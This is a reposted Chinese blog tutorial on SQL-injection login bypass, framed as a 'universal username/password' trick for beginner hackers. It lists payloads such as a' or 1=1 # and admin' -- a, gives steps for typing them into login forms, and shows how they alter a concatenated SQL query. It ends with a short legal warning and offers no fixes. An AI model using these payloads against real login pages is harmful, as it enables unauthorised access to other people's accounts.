1. 首页首页
  2. 科技前沿科技前沿

2025年万能账号密码使用详解,黑客常用的入门级操作

科技前沿 阅读 65

万能账号密码使用详解,黑客常用的入门级操作一 什么是万能账号密码 我们平时登录账号时 如果是第一次登录 系统会提示我们注册账号 并将我们注册的账号和密码保存到数据库中 当我们再次登录时 系统会将我们输入的账号和密码和数据库中的数据进行匹配 匹配成功能登录 这就意味着我们需要知道一个已经注册过并且正确的账号和密码才能进行登录

大家好,我是讯享网,很高兴认识大家。

一、什么是万能账号密码

我们平时登录账号时,如果是第一次登录,系统会提示我们注册账号,并将我们注册的账号和密码保存到数据库中。当我们再次登录时,系统会将我们输入的账号和密码和数据库中的数据进行匹配,匹配成功能登录。这就意味着我们需要知道一个已经注册过并且正确的账号和密码才能进行登录,那如果我不小心忘记了我的账号或者密码,或者我压根就不知道账号和密码,还有没有办法登录呢?答案是肯定的,那就是 【万能账号密码】

万能账号密码是指 【万能账号】和 【万能密码】,顾名思义,就是可以 【登录任意网站】的账号和密码

c5f49f90418aa97dbbae591ba1b10225.png
讯享网


1、万能账号

当我们不知道用户的账号并且不知道用户的密码时,可以使用万能账号。

【数值型万能账号】

  1. a or true #
  2. a or 1 #
  3. a or 1=1 #
  4. a or true -- a
  5. a or 1 -- a
  6. a or 1=1 -- a

【单引号字符型万能密码】

  1. a' or true #
  2. a' or 1 #
  3. a' or 1=1 #
  4. a' or true --a
  5. a' or 1 -- a
  6. a' or 1=1 -- a

【双引号字符型万能密码】

  1. a" or true #
  2. a" or 1 #
  3. a" or 1=1 #
  4. a" or true -- a
  5. a" or 1 -- a
  6. a" or 1=1 -- a


1.1 万能账号的使用

  • 账号输入 【万能账号】, 比如 a or true #
  • 密码随便输入,比如


2、万能密码

当我们知道用户的账号,但不知道用户的密码时,可以使用万能密码

【数值型万能密码】

  1. admin #
  2. admin -- a

【单引号字符串型万能密码】

  1. admin' #
  2. admin' -- a

【双引号字符串型万能密码】

  1. admin” #
  2. admin" -- a


2.1 万能密码的使用

  • 用户名输入 【万能密码】,比如 admin’ #
  • 密码随便输入,比如


三、万能账号密码原理剖析

一个网络安全意识淡薄的网站,其登录功能的SQL语句大概是下面这个样子

select * from user where username='user' and password='pass'

讯享网


1、万能账号原理

当我们在登录界面输入 【万能账号】比如 a’ or true # 以后,后端会将我们输入的参数拼接到SQL中,然后去数据库中查询账号和密码,SQL语句大概是下面这样

讯享网select * from user where username='a' or true #' and password='pass'

由于 # 在SQL中是注释符,注释符后面的内容不起作用,所以真正执行的SQL语句大概是下面这样

select * from user where username='a' or true

1.1 注释符

除了 # 以外, -- 也是SQL中的注释符,但SQL的语法格式规定--和后面的注释内容必须间隔一个空格,所以这需要使用 a' or 1 -- a 而不是 a' or 1 -- 其原理和 a’ or 1 # 大同小异,拼接到SQL中大概是下面这样

讯享网select * from user where username='a' or true -- a' and password='pass'
select * from user where username='a' or true

SQL语句恒成立,从而登录成功


1.2 比较运算符

SQL中规定,非布尔类型的数据参与比较运算时,会转化为布尔类型再参与运算。比如 or 1 或者 or 1=1 ,会转化为布尔类型的 true 再参与 or 的比较运算,也就是变成 or true ,同样能使条件恒成立,从而登录成功

简单来讲就是:a' or 1 # 或者 a' or 1=1 # 等价于 a' or true #

2、万能密码原理

当我们在登录界面输入 【万能密码】 比如 admin’ # 以后,后端会将我们输入的参数拼接到SQL中,大概是下面这样

讯享网select * from user where username='admin' #' and password='pass'

由于 # 在SQL中是注释符,注释符后面的内容不起作用,所以真正执行的SQL大概是下面这样

select * from user where username='admin'

SQL只会在数据库中查询用户名,而不是同时查询用户名和密码,这就意味着,只要用户名正确,就可以登录成功

3.1 注释符

除了 # ,-- 在SQL中也是注释符,SQL的语法格式规定 --后面必须使用空格来间隔后面的注释内容,所以需要将 --写作 -- a,后面的 a 可以是任意数字或者字母

简单来件就是 admin’ – a 等价于 admin‘ #

总结

【万能账号密码】适用于网络安全意识较差的网站,如果发现了可以使用的网站,切勿进行下一步操作,动歪脑筋的同学请在心理默念三遍:【我国有一部完整且历史悠久的法律】

来源:blog.csdn.net/wangyuxiang946/article/details/

b4ad074305b567811fefb8a09054869a.png 阅读更多

  • Python 学习手册
  • Pandas 学习大礼包
  • 100+ Python 爬虫项目
  • Python 数据分析入门手册
  • 100 道 Python 经典练习题
  • 70 个 Python 经典实用练手项目
  • 20张高清数据分析(Python)全知识地图
  • 14 张 Python 速查表玩转数据分析&可视化&机器学习

38ecda0d25857629fc5faf2be40bb9e2.gif

小讯
上一篇 2025-01-13 12:28
下一篇 2025-02-19 10:04

相关推荐

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/50784.html